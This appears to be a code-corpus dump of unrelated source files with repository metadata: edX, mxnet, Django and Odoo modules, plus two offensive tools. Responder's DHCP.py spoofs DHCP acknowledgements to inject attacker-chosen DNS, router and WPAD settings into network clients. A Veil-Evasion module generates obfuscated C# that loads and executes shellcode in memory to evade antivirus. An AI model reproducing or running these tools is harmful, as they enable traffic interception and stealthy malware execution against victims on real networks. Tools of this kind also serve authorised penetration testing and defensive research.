filter_fields = ("key", "user")
serializer_class = UserPreferenceSerializer
paginate_by = 10
paginate_by_param = "page_size"
class PreferenceUsersListView(generics.ListAPIView):
authentication_classes = (authentication.SessionAuthentication,)
permission_classes = (ApiKeyHeaderPermission,)
serializer_class = UserSerializer
paginate_by = 10
paginate_by_param = "page_size"
def get_queryset(self):
return User.objects.filter(preferences__key=self.kwargs["pref_key"]).prefetch_related("preferences")
class UpdateEmailOptInPreference(APIView):
"""View for updating the email opt in preference. """
authentication_classes = (SessionAuthenticationAllowInactiveUser,)
@method_decorator(require_post_params(["course_id", "email_opt_in"]))
@method_decorator(ensure_csrf_cookie)
def post(self, request):
""" Post function for updating the email opt in preference.
Allows the modification or creation of the email opt in preference at an
organizational level.
Args:
request (Request): The request should contain the following POST parameters:
* course_id: The slash separated course ID. Used to determine the organization
for this preference setting.
* email_opt_in: "True" or "False" to determine if the user is opting in for emails from
this organization. If the string does not match "True" (case insensitive) it will
assume False.
"""
course_id = request.DATA['course_id']
try:
org = locator.CourseLocator.from_string(course_id).org
except InvalidKeyError:
return HttpResponse(
status=400,
content="No course '{course_id}' found".format(course_id=course_id),
content_type="text/plain"
)
# Only check for true. All other values are False.
email_opt_in = request.DATA['email_opt_in'].lower() == 'true'
update_email_opt_in(request.user, org, email_opt_in)
return HttpResponse(status=status.HTTP_200_OK)
|
agpl-3.0
|
jorik041/Responder
|
tools/DHCP.py
|
10
|
13833
|
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import struct
import socket
import re
import optparse
import ConfigParser
import os
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, BASEDIR)
from odict import OrderedDict
from packets import Packet
from utils import *
parser = optparse.OptionParser(usage='python %prog -I eth0 -d pwned.com -p 10.20.30.40 -s 10.20.30.1 -r 10.20.40.1', prog=sys.argv[0],)
parser.add_option('-I', '--interface', action="store", help="Interface name to use, example: eth0", metavar="eth0",dest="Interface")
parser.add_option('-d', '--dnsname', action="store", help="DNS name to inject, if you don't want to inject a DNS server, provide the original one.", metavar="pwned.com", default="pwned.com",dest="DNSNAME")
parser.add_option('-r', '--router', action="store", help="The ip address of the router or yours if you want to intercept traffic.", metavar="10.20.1.1",dest="RouterIP")
parser.add_option('-p', '--primary', action="store", help="The ip address of the original primary DNS server or yours", metavar="10.20.1.10",dest="DNSIP")
parser.add_option('-s', '--secondary', action="store", help="The ip address of the original secondary DNS server or yours", metavar="10.20.1.11",dest="DNSIP2")
parser.add_option('-n', '--netmask', action="store", help="The netmask of this network", metavar="255.255.255.0", default="255.255.255.0", dest="Netmask")
parser.add_option('-w', '--wpadserver', action="store", help="Your WPAD server string", metavar="\"http://wpadsrv/wpad.dat\"", default="", dest="WPAD")
parser.add_option('-S', action="store_true", help="Spoof the router ip address",dest="Spoof")
parser.add_option('-R', action="store_true", help="Respond to DHCP Requests, inject linux clients (very noisy, this is sent on 255.255.255.255)", dest="Respond_To_Requests")
options, args = parser.parse_args()
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
if options.Interface is None:
print color("[!]", 1, 1), "-I mandatory option is missing, please provide an interface."
exit(-1)
if options.RouterIP is None:
print color("[!]", 1, 1), "-r mandatory option is missing, please provide the router's IP."
exit(-1)
if options.DNSIP is None:
print color("[!]", 1, 1), "-p mandatory option is missing, please provide the primary DNS server ip address or yours."
exit(-1)
if options.DNSIP2 is None:
print color("[!]", 1, 1), "-s mandatory option is missing, please provide the secondary DNS server ip address or yours."
exit(-1)
print '#############################################################################'
print '## DHCP INFORM TAKEOVER 0.2 ##'
print '## ##'
print '## By default, this script will only inject a new DNS/WPAD ##'
print '## server to a Windows <= XP/2003 machine. ##'
print '## ##'
print '## To inject a DNS server/domain/route on a Windows >= Vista and ##'
print '## any linux box, use -R (can be noisy) ##'
print '## ##'
print '## Use `RespondTo` setting in Responder.conf for in-scope targets only. ##'
print '#############################################################################'
print ''
print color('[*]', 2, 1), 'Listening for events...'
config = ConfigParser.ConfigParser()
config.read(os.path.join(BASEDIR,'Responder.conf'))
RespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')])
DontRespondTo = filter(None, [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')])
Interface = options.Interface
Responder_IP = FindLocalIP(Interface)
ROUTERIP = options.RouterIP
NETMASK = options.Netmask
DHCPSERVER = Responder_IP
DNSIP = options.DNSIP
DNSIP2 = options.DNSIP2
DNSNAME = options.DNSNAME
WPADSRV = options.WPAD.strip() + "\\n"
Spoof = options.Spoof
Respond_To_Requests = options.Respond_To_Requests
if Spoof:
DHCPSERVER = ROUTERIP
##### IP Header #####
class IPHead(Packet):
fields = OrderedDict([
("Version", "\x45"),
("DiffServices", "\x00"),
("TotalLen", "\x00\x00"),
("Ident", "\x00\x00"),
("Flags", "\x00\x00"),
("TTL", "\x40"),
("Protocol", "\x11"),
("Checksum", "\x00\x00"),
("SrcIP", ""),
("DstIP", ""),
])
class UDP(Packet):
fields = OrderedDict([
("SrcPort", "\x00\x43"),
("DstPort", "\x00\x44"),
("Len", "\x00\x00"),
("Checksum", "\x00\x00"),
("Data", "\x00\x00"),
])
def calculate(self):
self.fields["Len"] = struct.pack(">h",len(str(self.fields["Data"]))+8)
class DHCPACK(Packet):
fields = OrderedDict([
("MessType", "\x02"),
("HdwType", "\x01"),
("HdwLen", "\x06"),
("Hops", "\x00"),
("Tid", "\x11\x22\x33\x44"),
("ElapsedSec", "\x00\x00"),
("BootpFlags", "\x00\x00"),
("ActualClientIP", "\x00\x00\x00\x00"),
("GiveClientIP", "\x00\x00\x00\x00"),
("NextServerIP", "\x00\x00\x00\x00"),
("RelayAgentIP", "\x00\x00\x00\x00"),
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
("ClientMacPadding", "\x00" *10),
("ServerHostname", "\x00" * 64),
("BootFileName", "\x00" * 128),
("MagicCookie", "\x63\x82\x53\x63"),
("DHCPCode", "\x35"), #DHCP Message
("DHCPCodeLen", "\x01"),
("DHCPOpCode", "\x05"), #Msgtype(ACK)
("Op54", "\x36"),
("Op54Len", "\x04"),
("Op54Str", ""), #DHCP Server
("Op51", "\x33"),
("Op51Len", "\x04"),
("Op51Str", "\x00\x01\x51\x80"), #Lease time, 1 day
("Op1", "\x01"),
("Op1Len", "\x04"),
("Op1Str", ""), #Netmask
("Op15", "\x0f"),
("Op15Len", "\x0e"),
("Op15Str", ""), #DNS Name
("Op3", "\x03"),
("Op3Len", "\x04"),
("Op3Str", ""), #Router
("Op6", "\x06"),
("Op6Len", "\x08"),
("Op6Str", ""), #DNS Servers
("Op252", "\xfc"),
("Op252Len", "\x04"),
("Op252Str", ""), #Wpad Server
("Op255", "\xff"),
("Padding", "\x00"),
])
def calculate(self):
self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
self.fields["Op1Str"] = socket.inet_aton(NETMASK)
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
self.fields["Op15Str"] = DNSNAME
self.fields["Op252Str"] = WPADSRV
self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
class DHCPInformACK(Packet):
fields = OrderedDict([
("MessType", "\x02"),
("HdwType", "\x01"),
("HdwLen", "\x06"),
("Hops", "\x00"),
("Tid", "\x11\x22\x33\x44"),
("ElapsedSec", "\x00\x00"),
("BootpFlags", "\x00\x00"),
("ActualClientIP", "\x00\x00\x00\x00"),
("GiveClientIP", "\x00\x00\x00\x00"),
("NextServerIP", "\x00\x00\x00\x00"),
("RelayAgentIP", "\x00\x00\x00\x00"),
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
("ClientMacPadding", "\x00" *10),
("ServerHostname", "\x00" * 64),
("BootFileName", "\x00" * 128),
("MagicCookie", "\x63\x82\x53\x63"),
("Op53", "\x35\x01\x05"), #Msgtype(ACK)
("Op54", "\x36"),
("Op54Len", "\x04"),
("Op54Str", ""), #DHCP Server
("Op1", "\x01"),
("Op1Len", "\x04"),
("Op1Str", ""), #Netmask
("Op15", "\x0f"),
("Op15Len", "\x0e"),
("Op15Str", ""), #DNS Name
("Op3", "\x03"),
("Op3Len", "\x04"),
("Op3Str", ""), #Router
("Op6", "\x06"),
("Op6Len", "\x08"),
("Op6Str", ""), #DNS Servers
("Op252", "\xfc"),
("Op252Len", "\x04"),
("Op252Str", ""), #Wpad Server.
("Op255", "\xff"),
])
def calculate(self):
self.fields["Op54Str"] = socket.inet_aton(DHCPSERVER)
self.fields["Op1Str"] = socket.inet_aton(NETMASK)
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP)
self.fields["Op6Str"] = socket.inet_aton(DNSIP)+socket.inet_aton(DNSIP2)
self.fields["Op15Str"] = DNSNAME
self.fields["Op252Str"] = WPADSRV
self.fields["Op15Len"] = struct.pack(">b",len(str(self.fields["Op15Str"])))
self.fields["Op252Len"] = struct.pack(">b",len(str(self.fields["Op252Str"])))
def SpoofIP(Spoof):
return ROUTERIP if Spoof else Responder_IP
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
if len(RespondTo) and ClientIp not in RespondTo:
return False
if ClientIp in RespondTo or RespondTo == []:
if ClientIp not in DontRespondTo:
return True
return False
def IsUDP(data):
return True if data[0][23:24] == "\x11" else False
def ParseSrcDSTAddr(data):
SrcIP = socket.inet_ntoa(data[0][26:30])
DstIP = socket.inet_ntoa(data[0][30:34])
SrcPort = struct.unpack('>H',data[0][34:36])[0]
DstPort = struct.unpack('>H',data[0][36:38])[0]
return SrcIP, SrcPort, DstIP, DstPort
def FindIP(data):
IP = ''.join(re.findall('(?<=\x32\x04)[^EOF]*', data))
return ''.join(IP[0:4])
def ParseDHCPCode(data):
PTid = data[4:8]
Seconds = data[8:10]
CurrentIP = socket.inet_ntoa(data[12:16])
RequestedIP = socket.inet_ntoa(data[16:20])
MacAddr = data[28:34]
MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr).upper()
OpCode = data[242:243]
RequestIP = data[245:249]
# DHCP Inform
if OpCode == "\x08":
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=socket.inet_aton(CurrentIP))
Packet = DHCPInformACK(Tid=PTid, ClientMac=MacAddr, ActualClientIP=socket.inet_aton(CurrentIP), \
GiveClientIP=socket.inet_aton("0.0.0.0"), \
NextServerIP=socket.inet_aton("0.0.0.0"), \
RelayAgentIP=socket.inet_aton("0.0.0.0"), \
ElapsedSec=Seconds)
Packet.calculate()
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
return 'Acknowleged DHCP Inform for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
# DHCP Request
if OpCode == "\x03" and Respond_To_Requests:
IP = FindIP(data)
if IP:
IPConv = socket.inet_ntoa(IP)
if RespondToThisIP(IPConv):
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, ElapsedSec=Seconds)
Packet.calculate()
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
return 'Acknowleged DHCP Request for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
# DHCP Discover
if OpCode == "\x01" and Respond_To_Requests:
IP = FindIP(data)
if IP:
IPConv = socket.inet_ntoa(IP)
if RespondToThisIP(IPConv):
IP_Header = IPHead(SrcIP = socket.inet_aton(SpoofIP(Spoof)), DstIP=IP)
Packet = DHCPACK(Tid=PTid, ClientMac=MacAddr, GiveClientIP=IP, DHCPOpCode="\x02", ElapsedSec=Seconds)
Packet.calculate()
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
return 'Acknowleged DHCP Discover for IP: %s, Req IP: %s, MAC: %s Tid: %s' % (CurrentIP, RequestedIP, MacAddrStr, '0x'+PTid.encode('hex'))
def SendDHCP(packet,Host):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(packet, Host)
if __name__ == "__main__":
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
s.bind((Interface, 0x0800))
while True:
try:
data = s.recvfrom(65535)
if IsUDP(data):
SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
if SrcPort == 67 or DstPort == 67:
ret = ParseDHCPCode(data[0][42:])
if ret:
print text("[DHCP] %s" % ret)
except KeyboardInterrupt:
sys.exit("\r%s Exiting..." % color('[*]', 2, 1))
|
gpl-3.0
|
nicklhy/mxnet
|
example/speech-demo/io_func/utils.py
|
25
|
5707
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys, subprocess, pickle, os, json, logging, socket
import logging.config
import datetime
from . import info
def getRunDir():
return os.path.dirname(os.path.realpath(sys.argv[0]))
def setup_logger(logging_ini):
if logging_ini is not None:
print("Using custom logger")
else:
logging_ini = os.path.join(info.CONFIGS, 'logging.ini')
logging.config.fileConfig(logging_ini)
logger = logging.getLogger(__name__)
logger.info("**************************************************")
logger.info(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"))
logger.info("Host: " + str(socket.gethostname()))
logger.info("Screen: " + os.getenv("STY", "unknown"))
logger.info("PWD: " + os.getenv("PWD", "unknown"))
logger.info("Cmd: " + str(sys.argv))
logger.info("**************************************************")
def to_bool(obj):
if str(obj).lower() in ["true", "1"]:
return True
elif str(obj).lower() in ["false", "0"]:
return False
else:
raise Exception("to_bool: cannot convert to bool")
def line_with_arg(line):
line = line.strip()
return line is not "" and not line.startswith("#")
def parse_conv_spec(conv_spec, batch_size):
# "1x29x29:100,5x5,p2x2:200,4x4,p2x2,f"
conv_spec = conv_spec.replace('X', 'x')
structure = conv_spec.split(':')
conv_layer_configs = []
for i in range(1, len(structure)):
config = {}
elements = structure[i].split(',')
if i == 1:
input_dims = structure[i - 1].split('x')
prev_map_number = int(input_dims[0])
prev_feat_dim_x = int(input_dims[1])
prev_feat_dim_y = int(input_dims[2])
else:
prev_map_number = conv_layer_configs[-1]['output_shape'][1]
prev_feat_dim_x = conv_layer_configs[-1]['output_shape'][2]
prev_feat_dim_y = conv_layer_configs[-1]['output_shape'][3]
current_map_number = int(elements[0])
filter_xy = elements[1].split('x')
filter_size_x = int(filter_xy[0])
filter_size_y = int(filter_xy[1])
pool_xy = elements[2].replace('p','').replace('P','').split('x')
pool_size_x = int(pool_xy[0])
pool_size_y = int(pool_xy[1])
output_dim_x = (prev_feat_dim_x - filter_size_x + 1) / pool_size_x
output_dim_y = (prev_feat_dim_y - filter_size_y + 1) / pool_size_y
config['input_shape'] = (batch_size, prev_map_number, prev_feat_dim_x, prev_feat_dim_y)
config['filter_shape'] = (current_map_number, prev_map_number, filter_size_x, filter_size_y)
config['poolsize'] = (pool_size_x, pool_size_y)
config['output_shape'] = (batch_size, current_map_number, output_dim_x, output_dim_y)
if len(elements) == 4 and elements[3] == 'f':
config['flatten'] = True
else:
config['flatten'] = False
conv_layer_configs.append(config)
return conv_layer_configs
def _relu(x):
return x * (x > 0)
def _capped_relu(x):
return T.minimum(x * (x > 0), 6)
def _linear(x):
return x * 1.0
def parse_activation(act_str):
print("***", act_str)
if act_str == 'sigmoid':
return T.nnet.sigmoid
elif act_str == 'tanh':
return T.tanh
elif act_str == 'relu':
return _relu
elif act_str == 'capped_relu':
return _capped_relu
elif act_str == 'linear':
return _linear
return T.nnet.sigmoid
def activation_to_txt(act_func):
if act_func == T.nnet.sigmoid:
return 'sigmoid'
if act_func == T.tanh:
return 'tanh'
def parse_two_integers(argument_str):
elements = argument_str.split(":")
int_strs = elements[1].split(",")
return int(int_strs[0]), int(int_strs[1])
"""
Usage:
command = 'mysqladmin create test -uroot -pmysqladmin12'
for line in run_command(command):
print(line)
"""
def run_command(command):
fnull = open(os.devnull, 'w')
p = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=fnull,
shell=True)
return p, iter(p.stdout.readline, b'')
def pickle_load(filename):
f = open(filename, "rb")
try:
obj = pickle.load(f)
except Exception:
f.close()
f = open(filename, "rb")
print("Not a pickled file... try to load as text format: " + filename)
obj = json.load(f)
f.close()
return obj
def pickle_save(obj, filename):
f = open(filename + ".new", "wb")
pickle.dump(obj, f)
f.close()
os.rename(filename + ".new", filename)
def makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
def kahan_add(total, carry, inc):
cs = T.add_no_assoc(carry, inc)
s = T.add_no_assoc(total, cs)
update_carry = T.sub(cs, T.sub(s, total))
update_total = s
return update_total, update_carry
|
apache-2.0
|
nicklhy/mxnet
|
example/rcnn/test.py
|
41
|
2878
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import mxnet as mx
from rcnn.logger import logger
from rcnn.config import config, default, generate_config
from rcnn.tools.test_rcnn import test_rcnn
def parse_args():
parser = argparse.ArgumentParser(description='Test a Faster R-CNN network')
# general
parser.add_argument('--network', help='network name', default=default.network, type=str)
parser.add_argument('--dataset', help='dataset name', default=default.dataset, type=str)
args, rest = parser.parse_known_args()
generate_config(args.network, args.dataset)
parser.add_argument('--image_set', help='image_set name', default=default.test_image_set, type=str)
parser.add_argument('--root_path', help='output data folder', default=default.root_path, type=str)
parser.add_argument('--dataset_path', help='dataset path', default=default.dataset_path, type=str)
# testing
parser.add_argument('--prefix', help='model to test with', default=default.e2e_prefix, type=str)
parser.add_argument('--epoch', help='model to test with', default=default.e2e_epoch, type=int)
parser.add_argument('--gpu', help='GPU device to test with', default=0, type=int)
# rcnn
parser.add_argument('--vis', help='turn on visualization', action='store_true')
parser.add_argument('--thresh', help='valid detection threshold', default=1e-3, type=float)
parser.add_argument('--shuffle', help='shuffle data on visualization', action='store_true')
parser.add_argument('--has_rpn', help='generate proposals on the fly', action='store_true', default=True)
parser.add_argument('--proposal', help='can be ss for selective search or rpn', default='rpn', type=str)
args = parser.parse_args()
return args
def main():
args = parse_args()
logger.info('Called with argument: %s' % args)
ctx = mx.gpu(args.gpu)
test_rcnn(args.network, args.dataset, args.image_set, args.root_path, args.dataset_path,
ctx, args.prefix, args.epoch,
args.vis, args.shuffle, args.has_rpn, args.proposal, args.thresh)
if __name__ == '__main__':
main()
|
apache-2.0
|
liorvh/Veil-Evasion
|
modules/payloads/cs/shellcode_inject/virtual.py
|
12
|
3235
|
"""
C# inline shellcode injector using the VirtualAlloc()/CreateThread() pattern.
Uses basic variable renaming obfuscation.
Adapated from code from:
http://webstersprodigy.net/2012/08/31/av-evading-meterpreter-shell-from-a-net-service/
Module built by @harmj0y
"""
from modules.common import shellcode
from modules.common import helpers
from modules.common import encryption
class Payload:
def __init__(self):
# required
self.language = "cs"
self.extension = "cs"
self.rating = "Poor"
self.description = "C# VirtualAlloc method for inline shellcode injection"
self.shellcode = shellcode.Shellcode()
# options we require user ineraction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_ARYA" : ["N", "Use the Arya crypter"]
}
def generate(self):
Shellcode = self.shellcode.generate(self.required_options)
Shellcode = "0" + ",0".join(Shellcode.split("\\")[1:])
# randomize all our variable names, yo'
namespaceName = helpers.randomString()
className = helpers.randomString()
bytearrayName = helpers.randomString()
funcAddrName = helpers.randomString()
hThreadName = helpers.randomString()
threadIdName = helpers.randomString()
pinfoName = helpers.randomString()
# get 12 random variables for the API imports
r = [helpers.randomString() for x in xrange(12)]
payloadCode = "using System; using System.Net; using System.Net.Sockets; using System.Runtime.InteropServices;\n"
payloadCode += "namespace %s { class %s { static void Main() {\n" % (namespaceName, className)
payloadCode += "byte[] %s = {%s};" % (bytearrayName,Shellcode)
payloadCode += "UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (funcAddrName, bytearrayName)
payloadCode += "Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (bytearrayName, funcAddrName, bytearrayName)
payloadCode += "IntPtr %s = IntPtr.Zero; UInt32 %s = 0; IntPtr %s = IntPtr.Zero;\n" %(hThreadName, threadIdName, pinfoName)
payloadCode += "%s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (hThreadName, funcAddrName, pinfoName, threadIdName)
payloadCode += "WaitForSingleObject(%s, 0xFFFFFFFF);}\n" %(hThreadName)
# payloadCode += "private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\n"
payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
if self.required_options["USE_ARYA"][0].lower() == "y":
payloadCode = encryption.arya(payloadCode)
return payloadCode
|
gpl-3.0
|
ajaali/django
|
django/contrib/admin/templatetags/log.py
|
499
|
2080
|
from django import template
from django.contrib.admin.models import LogEntry
register = template.Library()
class AdminLogNode(template.Node):
def __init__(self, limit, varname, user):
self.limit, self.varname, self.user = limit, varname, user
def __repr__(self):
return "<GetAdminLog Node>"
def render(self, context):
if self.user is None:
entries = LogEntry.objects.all()
else:
user_id = self.user
if not user_id.isdigit():
user_id = context[self.user].pk
entries = LogEntry.objects.filter(user__pk=user_id)
context[self.varname] = entries.select_related('content_type', 'user')[:int(self.limit)]
return ''
@register.tag
def get_admin_log(parser, token):
"""
Populates a template variable with the admin log for the given criteria.
Usage::
{% get_admin_log [limit] as [varname] for_user [context_var_containing_user_obj] %}
Examples::
{% get_admin_log 10 as admin_log for_user 23 %}
{% get_admin_log 10 as admin_log for_user user %}
{% get_admin_log 10 as admin_log %}
Note that ``context_var_containing_user_obj`` can be a hard-coded integer
(user ID) or the name of a template context variable containing the user
object whose ID you want.
"""
tokens = token.contents.split()
if len(tokens) < 4:
raise template.TemplateSyntaxError(
"'get_admin_log' statements require two arguments")
if not tokens[1].isdigit():
raise template.TemplateSyntaxError(
"First argument to 'get_admin_log' must be an integer")
if tokens[2] != 'as':
raise template.TemplateSyntaxError(
"Second argument to 'get_admin_log' must be 'as'")
if len(tokens) > 4:
if tokens[4] != 'for_user':
raise template.TemplateSyntaxError(
"Fourth argument to 'get_admin_log' must be 'for_user'")
return AdminLogNode(limit=tokens[1], varname=tokens[3], user=(tokens[5] if len(tokens) > 5 else None))
|
bsd-3-clause
|
minhphung171093/GreenERP_V8
|
openerp/addons/payment_sips/controllers/main.py
|
153
|
1864
|
# -*- coding: utf-8 -*-
try:
import simplejson as json
except ImportError:
import json
import logging
import werkzeug
from openerp import http
from openerp.http import request
_logger = logging.getLogger(__name__)
class SipsController(http.Controller):
_notify_url = '/payment/sips/ipn/'
_return_url = '/payment/sips/dpn/'
def _get_return_url(self, **post):
""" Extract the return URL from the data coming from sips. """
return_url = post.pop('return_url', '')
if not return_url:
tx_obj = request.registry['payment.transaction']
data = tx_obj._sips_data_to_object(post.get('Data'))
custom = json.loads(data.pop('returnContext', False) or '{}')
return_url = custom.get('return_url', '/')
return return_url
def sips_validate_data(self, **post):
res = False
env = request.env
tx_obj = env['payment.transaction']
acquirer_obj = env['payment.acquirer']
sips = acquirer_obj.search([('provider', '=', 'sips')], limit=1)
security = sips._sips_generate_shasign(post)
if security == post['Seal']:
_logger.debug('Sips: validated data')
res = tx_obj.sudo().form_feedback(post, 'sips')
else:
_logger.warning('Sips: data are corrupted')
return res
@http.route([
'/payment/sips/ipn/'],
type='http', auth='none', methods=['POST'])
def sips_ipn(self, **post):
""" Sips IPN. """
self.sips_validate_data(**post)
return ''
@http.route([
'/payment/sips/dpn'], type='http', auth="none", methods=['POST'])
def sips_dpn(self, **post):
""" Sips DPN """
return_url = self._get_return_url(**post)
self.sips_validate_data(**post)
return werkzeug.utils.redirect(return_url)
|
agpl-3.0
|
pombredanne/teamwork
|
w2/static/Brython2.0.0-20140209-164925/Lib/xml/etree/ElementPath.py
|
785
|
9477
|
#
# ElementTree
# $Id: ElementPath.py 3375 2008-02-13 08:05:08Z fredrik $
#
# limited xpath support for element trees
#
# history:
# 2003-05-23 fl created
# 2003-05-28 fl added support for // etc
# 2003-08-27 fl fixed parsing of periods in element names
# 2007-09-10 fl new selection engine
# 2007-09-12 fl fixed parent selector
# 2007-09-13 fl added iterfind; changed findall to return a list
# 2007-11-30 fl added namespaces support
# 2009-10-30 fl added child element value filter
#
# Copyright (c) 2003-2009 by Fredrik Lundh. All rights reserved.
#
# [email protected]
# http://www.pythonware.com
#
# --------------------------------------------------------------------
# The ElementTree toolkit is
#
# Copyright (c) 1999-2009 by Fredrik Lundh
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and
# its associated documentation for any purpose and without fee is
# hereby granted, provided that the above copyright notice appears in
# all copies, and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Secret Labs AB or the author not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT-
# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR
# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
# --------------------------------------------------------------------
# Licensed to PSF under a Contributor Agreement.
# See http://www.python.org/psf/license for licensing details.
##
# Implementation module for XPath support. There's usually no reason
# to import this module directly; the <b>ElementTree</b> does this for
# you, if needed.
##
import re
xpath_tokenizer_re = re.compile(
"("
"'[^']*'|\"[^\"]*\"|"
"::|"
"//?|"
"\.\.|"
"\(\)|"
"[/.*:\[\]\(\)@=])|"
"((?:\{[^}]+\})?[^/\[\]\(\)@=\s]+)|"
"\s+"
)
def xpath_tokenizer(pattern, namespaces=None):
for token in xpath_tokenizer_re.findall(pattern):
tag = token[1]
if tag and tag[0] != "{" and ":" in tag:
try:
prefix, uri = tag.split(":", 1)
if not namespaces:
raise KeyError
yield token[0], "{%s}%s" % (namespaces[prefix], uri)
except KeyError:
raise SyntaxError("prefix %r not found in prefix map" % prefix)
else:
yield token
def get_parent_map(context):
parent_map = context.parent_map
if parent_map is None:
context.parent_map = parent_map = {}
for p in context.root.iter():
for e in p:
parent_map[e] = p
return parent_map
def prepare_child(next, token):
tag = token[1]
def select(context, result):
for elem in result:
for e in elem:
if e.tag == tag:
yield e
return select
def prepare_star(next, token):
def select(context, result):
for elem in result:
for e in elem:
yield e
return select
def prepare_self(next, token):
def select(context, result):
for elem in result:
yield elem
return select
def prepare_descendant(next, token):
token = next()
if token[0] == "*":
tag = "*"
elif not token[0]:
tag = token[1]
else:
raise SyntaxError("invalid descendant")
def select(context, result):
for elem in result:
for e in elem.iter(tag):
if e is not elem:
yield e
return select
def prepare_parent(next, token):
def select(context, result):
# FIXME: raise error if .. is applied at toplevel?
parent_map = get_parent_map(context)
result_map = {}
for elem in result:
if elem in parent_map:
parent = parent_map[elem]
if parent not in result_map:
result_map[parent] = None
yield parent
return select
def prepare_predicate(next, token):
